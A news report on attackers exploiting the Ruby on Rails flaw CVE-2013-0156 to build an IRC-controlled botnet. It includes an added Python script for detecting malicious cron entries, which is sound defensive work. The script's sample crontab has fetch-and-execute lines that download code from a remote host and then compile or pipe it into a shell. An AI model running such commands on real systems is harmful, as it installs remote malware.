Ruby on Rails flaw used to create botnet

A critical vulnerability in the Web application development framework Ruby on Rails is being exploited by hackers to compromise servers and build a botnet.

The vulnerability, known as CVE-2013-0156, was the subject of a patch released by the Ruby on Rails development team several months ago, according to Jeff Jarmoc, security consultant with security research company Matasano Security.

“This vulnerability was the subject of much discussion, and an emergency RoR advisory back in January,” he said in his blog. “It’s pretty surprising that it’s taken this long to surface in the wild, but less surprising that people are still running vulnerable installations of Rails.”

The exploit, he said, adds a scheduled task on Linux machines that executes a series of commands.


The commands download a malicious C source file from a remote server. The resulting malware connects to an Internet Relay Chat (IRC) server and joins a channel where it receives commands from the attackers.
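The persistence mechanism described above (a scheduled task that fetches a remote file and then builds or runs it) is something a defender can look for in crontabs. The following is an added example, not code from the article or from Matasano; the crontab lines, paths and addresses in it are constructed for illustration.

```python
"""Flag cron entries that fetch remote content and then compile or execute it."""
import re

# Constructed sample crontab (documentation-range IPs, not real indicators).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/15 * * * * /home/app/bin/cleanup_tmp.sh
* * * * * wget -q -O /tmp/x.c http://198.51.100.7/x.c && gcc -o /tmp/x /tmp/x.c && /tmp/x
@reboot curl -s http://203.0.113.5/payload | sh
"""

FETCH = re.compile(r"\b(wget|curl|fetch)\b")
BUILD_OR_RUN = re.compile(r"\b(gcc|cc|tcc|make|sh|bash|perl|python)\b")
TMP_DIR = re.compile(r"/(tmp|dev/shm|var/tmp)/")


def parse_crontab(text):
    """Yield (schedule, command) for each non-comment crontab line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):  # @reboot, @daily, ...
            sched, _, cmd = line.partition(" ")
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue  # malformed entry, skip
            sched, cmd = " ".join(fields[:5]), fields[5]
        yield sched, cmd


def suspicious_entries(text):
    """Return commands that download something and then build/run it,
    or that stage the download in a world-writable temp directory."""
    hits = []
    for _sched, cmd in parse_crontab(text):
        fetches = bool(FETCH.search(cmd))
        runs = bool(BUILD_OR_RUN.search(cmd)) or bool(TMP_DIR.search(cmd))
        if fetches and runs:
            hits.append(cmd)
    return hits


if __name__ == "__main__":
    for entry in suspicious_entries(SAMPLE_CRONTAB):
        print("SUSPICIOUS:", entry)
```

On a live host, feed it the output of `crontab -l` per user and the contents of /etc/cron.d; the heuristic is a triage aid, so review hits by hand.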

Jarmoc described the exploit as a “pretty straightforward skiddy exploit.”

“Functionality is limited, but it includes the ability to download and execute files as commanded, as well as changing servers,” he said. “There’s no authentication performed, so an enterprising individual could hijack these bots fairly easily by joining the IRC server and issuing the appropriate commands.”

Read the full text of Jeff Jarmoc’s post here
